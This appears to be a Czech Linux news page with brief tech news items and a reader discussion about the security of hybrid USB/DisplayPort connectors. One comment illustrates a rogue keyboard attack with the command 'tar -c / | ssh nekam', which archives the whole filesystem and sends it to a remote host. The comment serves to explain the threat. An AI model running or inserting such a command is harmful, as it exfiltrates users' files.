Kevin Lin zkouší využívat chytré brýle Mentra při hraní na piano. Vytváří aplikaci AugmentedChords, pomocí které si do brýlí posílá notový zápis (YouTube). Uvnitř brýlí běží AugmentOS (GitHub), tj. open source operační systém pro chytré brýle.
Jarní konference EurOpen.cz 2025 proběhne 26. až 28. května v Brandýse nad Labem. Věnována je programovacím jazykům, vývoji softwaru a programovacím technikám.
Na čem aktuálně pracují vývojáři GNOME a KDE Plasma? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE Plasma.
Před 25 lety zaplavil celý svět virus ILOVEYOU. Virus se šířil e-mailem, jenž nesl přílohu s názvem I Love You. Příjemci, zvědavému, kdo se do něj zamiloval, pak program spuštěný otevřením přílohy načetl z adresáře e-mailové adresy a na ně pak „milostný vzkaz“ poslal dál. Škody vznikaly jak zahlcením e-mailových serverů, tak i druhou činností viru, kterou bylo přemazání souborů uložených v napadeném počítači.
Byla vydána nová major verze 5.0.0 svobodného multiplatformního nástroje BleachBit (GitHub, Wikipedie) určeného především k efektivnímu čištění disku od nepotřebných souborů.
Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za duben (YouTube).
Provozovatel čínské sociální sítě TikTok dostal v Evropské unii pokutu 530 milionů eur (13,2 miliardy Kč) za nedostatky při ochraně osobních údajů. Ve svém oznámení to dnes uvedla irská Komise pro ochranu údajů (DPC), která jedná jménem EU. Zároveň TikToku nařídila, že pokud správu dat neuvede do šesti měsíců do souladu s požadavky, musí přestat posílat data o unijních uživatelích do Číny. TikTok uvedl, že se proti rozhodnutí odvolá.
Společnost JetBrains uvolnila Mellum, tj. svůj velký jazykový model (LLM) pro vývojáře, jako open source. Mellum podporuje programovací jazyky Java, Kotlin, Python, Go, PHP, C, C++, C#, JavaScript, TypeScript, CSS, HTML, Rust a Ruby.
Vývojáři Kali Linuxu upozorňují na nový klíč pro podepisování balíčků. K původnímu klíči ztratili přístup.
V březnu loňského roku přestal být Redis svobodný. Společnost Redis Labs jej přelicencovala z licence BSD na nesvobodné licence Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1). Hned o pár dní později vznikly svobodné forky Redisu s názvy Valkey a Redict. Dnes bylo oznámeno, že Redis je opět svobodný. S nejnovější verzí 8 je k dispozici také pod licencí AGPLv3.
Nemůžu si pomoci, ale tohle je u mě inovace roku.
Nemůžu si pomoct, ale tohle je prasárna roku. Ať žije nabourávání bezpečnosti tím, že člověk zapojí DisplayPort a ono to je místo toho USB zařízení...
Navíc, všechny tyhle hybridní konektory trpí tím, že se ze samotného konektoru nepozná, jaké rozhraní tam skutečně je implementováno, viz např. miniPCIe vs. USB vs. mSATA a podobně.
To povidej vsem tem lidem, kterym bud lezi usb hub vedle monitoru, nebo maji druhy kabel z pocitace do monitoru.
Tohle nám cpal marketing už v době nástupu USB 1.0 – jak to bude úžasné a zbavíme se změnit kabelů… Příliš mnoho se nezměnilo.
USB bylo presne takto navrhovano = ze se rarizeni budou pripojovet zasebou, jedno do druheho, takze ti na PC pricipielne staci port jedinej.No, o tom docela pochybuji (teda ze to nekdo u vyrobcu takto zamyslel). Tahle uvaha o jednem portu ma totiz drobnou chybicku - vsechna zarizeni pripojena na jeden USB kontroler sdileji jeho rychlost. Tj vcetne hubu a tech zarizeni za nima. Takze zapojis huby do takoveho "stromu", a na ne tucet zarizeni, to budes mit rychle jak analogovej modem
Hodně toho jde totiž už jen elektronicky a na papír si to člověk tiskne jen když si v tom potřebuje listovat.
Kéž by. :-( Stačí opustit IT sféru a budete se divit, kolik lidí si tiskne e-maily nebo webové stránky.
ZIP mechaniku mám s USB rozhraním a tiskárnu připojenou přes ethernet. Ale stejně mi do počítače vede napájení, HDMI, audiokabely, ethernet a pak asi šest USB kabelů. V klávesnici USB rozbočovač mám, takže něco se omezit podařilo, ale nepřijde mi to jako nějaká velká revoluce1 od dob, kdy jsem běžně používal PS/2, LPT, COM porty… Navíc většina zařízení má dlouhé kabely (aby dosáhly až k počítači pod stolem), takže při použití rozbočovače tam zase přebývají metry kabelu a visí ze stolu.
[1] ve smyslu omezení změti kabelů – naopak vyšší rychlost, napájení a univerzálnost jsou jednoznačně plus USBčka
Kdyz vlozis sitovou kartu, tak ji system muze bez uzivatelova vedomi aktivovat a presunout provoz do internetu po ni.
To by většinou nemělo ničemu vadit – stejně bys měl předpokládat, že síti nemůžeš věřit a musíš si ověřovat certifikáty a šifrovat.
Nešifrovaná komunikace dává smysl leda v nějaké uzavřené síti, třeba v serverovně, kde chceš mezi stroji maximální propustnost a nechceš se zdržovat šifrováním (když po těch drátech stejně nic jiného nepoteče). Ale tam zase nebudeš připojovat neznámá USB zařízení.
Nicméně souhlas, že systém by tu novou síťovku neměl začít automaticky používat, nahodit na ní DHCP a posílat přes ní data.
Kdyz vlozite klavesnici, system ochotne interpretuje vlozene klavesy (treba beznou klavesu na otevreni terminalu a nasledne "tar -c / | ssh nekam".
Tohle už je nebezpečnější.
Rozumné nastavení by bylo, že když už je jedna klávesnice připojená, tak se to při připojení druhé zeptá, než ji začne používat. Případně by si uživatel mohl tohle chování změnit (třeba když si k počítači často připojuje jinou klávesnici a naopak tam nestrká nedůvěryhodná zařízení).
Tohle už je nebezpečnější. Rozumné nastavení by bylo, že když už je jedna klávesnice připojená, tak se to při připojení druhé zeptá, než ji začne používat. Případně by si uživatel mohl tohle chování změnit (třeba když si k počítači často připojuje jinou klávesnici a naopak tam nestrká nedůvěryhodná zařízení).Nebo zamykat obrazovku.
Tiskni
Sdílej: